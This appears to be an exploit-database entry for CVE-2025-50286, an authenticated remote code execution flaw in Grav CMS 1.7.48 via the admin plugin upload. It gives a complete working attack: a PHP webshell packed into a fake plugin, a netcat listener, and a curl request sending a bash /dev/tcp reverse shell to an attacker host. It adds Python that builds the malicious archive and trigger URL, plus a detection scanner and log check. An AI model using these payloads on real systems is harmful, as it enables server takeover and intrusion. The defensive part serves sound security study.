| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2025-50286 | 6 Aug 2025 00:00 | – | attackerkb |
| CVE-2025-50286 | 6 Aug 2025 17:50 | – | circl |
| Grav CMS security vulnerability | 6 Aug 2025 00:00 | – | cnnvd |
| Grav CMS Remote Code Execution Vulnerability | 18 Aug 2025 00:00 | – | cnvd |
| CVE-2025-50286 | 6 Aug 2025 00:00 | – | cve |
| CVE-2025-50286 | 6 Aug 2025 00:00 | – | cvelist |
| Exploit for Unrestricted Upload of File with Dangerous Type in Getgrav Grav | 28 Feb 2026 17:39 | – | githubexploit |
| Exploit for CVE-2025-50286 | 5 Aug 2025 01:46 | – | githubexploit |
| Grav CMS 1.7.48 - Remote Code Execution (RCE) | 11 Aug 2025 00:00 | – | exploitdb |
| EUVD-2025-23842 | 3 Oct 2025 20:07 | – | euvd |
# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a plugin archive containing arbitrary PHP code, which the server executes when the file is requested.
# Steps to Reproduce:
1. Start a listener on your attack machine:
nc -lvnp 4444
2. Log in to the Grav Admin Panel as an administrator:
https://<target>/admin
3. Navigate to:
Tools → Direct Install
4. Upload a ZIP archive containing the following structure:
evilplugin/
├── evilplugin.php # Contains: <?php shell_exec($_GET['cmd']); ?>
└── blueprints.yaml # Minimal content to pass plugin validation
5. Request the uploaded plugin's PHP file with the `cmd` parameter to trigger the payload (`<attacker-ip>` is the host running the listener from step 1):
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'" http://<target>/
6. Observe the reverse shell:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
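The archive from step 4, the trigger request from step 5, and a defender's view of both, as an added example in Python that is not part of the original exploit or of Grav. `inspect_plugin_archive` is a hypothetical illustration of the validation the notes below say Direct Install lacks; the blueprint keys, the `user/plugins/<slug>/` install path used in the sample log line, and the log line itself are constructed assumptions.

```python
# Added example (not part of the original exploit or of Grav): builds the
# plugin archive with the layout from step 4, runs a hypothetical pre-install
# check over it, builds the step-5 trigger URL, and flags the trigger request
# in an Apache access-log line.
import io
import re
import zipfile
from urllib.parse import parse_qs, urlencode, urlsplit

# Archive contents from step 4 (constructed sample; the blueprint keys are a
# minimal guess, not a real Grav blueprint).
PAYLOAD_PHP = "<?php shell_exec($_GET['cmd']); ?>"
BLUEPRINT_YAML = "name: evilplugin\nversion: 1.0.0\ndescription: test\n"

# PHP functions that hand a string to the OS or to the PHP interpreter.
DANGEROUS_SINKS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(", re.I
)
# Command fragments typical of the step-5 reverse-shell payload.
REVSHELL_MARKERS = re.compile(r"/dev/tcp/|bash -i|nc -e|mkfifo", re.I)


def build_plugin_zip(slug="evilplugin", php_source=PAYLOAD_PHP,
                     blueprint=BLUEPRINT_YAML) -> bytes:
    """Return a ZIP holding <slug>/<slug>.php and <slug>/blueprints.yaml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", php_source)
        zf.writestr(f"{slug}/blueprints.yaml", blueprint)
    return buf.getvalue()


def inspect_plugin_archive(data: bytes) -> dict:
    """Hypothetical validation of an uploaded plugin archive.

    Every plugin legitimately contains PHP, so only calls to execution sinks
    and unsafe entry names are flagged; an empty report is not proof of safety.
    """
    report = {"php_files": [], "flagged": [], "unsafe_names": [],
              "has_blueprint": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.split("/")
            if name.startswith("/") or ".." in parts:
                report["unsafe_names"].append(name)   # zip-slip style entry
            if parts[-1] == "blueprints.yaml":
                report["has_blueprint"] = True
            if name.lower().endswith((".php", ".phtml", ".phar")):
                report["php_files"].append(name)
                src = zf.read(name).decode("utf-8", errors="replace")
                for m in DANGEROUS_SINKS.finditer(src):
                    report["flagged"].append((name, m.group(1).lower()))
    return report


def build_trigger_url(endpoint: str, cmd: str) -> str:
    """Equivalent of the step-5 `curl --get --data-urlencode "cmd=..."`."""
    return f"{endpoint}?{urlencode({'cmd': cmd})}"


def is_webshell_trigger(log_line: str) -> bool:
    """True when an Apache combined-log request carries a reverse-shell cmd."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return False
    query = parse_qs(urlsplit(m.group(1)).query)
    return any(REVSHELL_MARKERS.search(v) for v in query.get("cmd", []))


# Constructed log line; the path assumes Grav unpacks the archive under
# user/plugins/<slug>/ and that the file is reachable over HTTP.
SAMPLE_LOG_LINE = (
    '10.0.0.5 - - [07/Aug/2025:12:00:00 +0000] '
    '"GET /user/plugins/evilplugin/evilplugin.php?cmd=bash+-c+%27bash+-i+'
    '%3E%26+/dev/tcp/10.0.0.9/4444+0%3E%261%27 HTTP/1.1" 200 -'
)

if __name__ == "__main__":
    archive = build_plugin_zip()
    print(inspect_plugin_archive(archive))
    print(build_trigger_url("http://target/evilplugin.php", "id"))
    print(is_webshell_trigger(SAMPLE_LOG_LINE))
```

The sink scan is a heuristic: installing any plugin means running its PHP, so the real trust boundary here is the administrator account, and a scan like this only catches the crude webshell above, not a payload that builds its command from obfuscated strings.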
# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Successful exploitation may result in full system compromise.
# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286
# Disclaimer:
This exploit is provided for educational and research purposes only.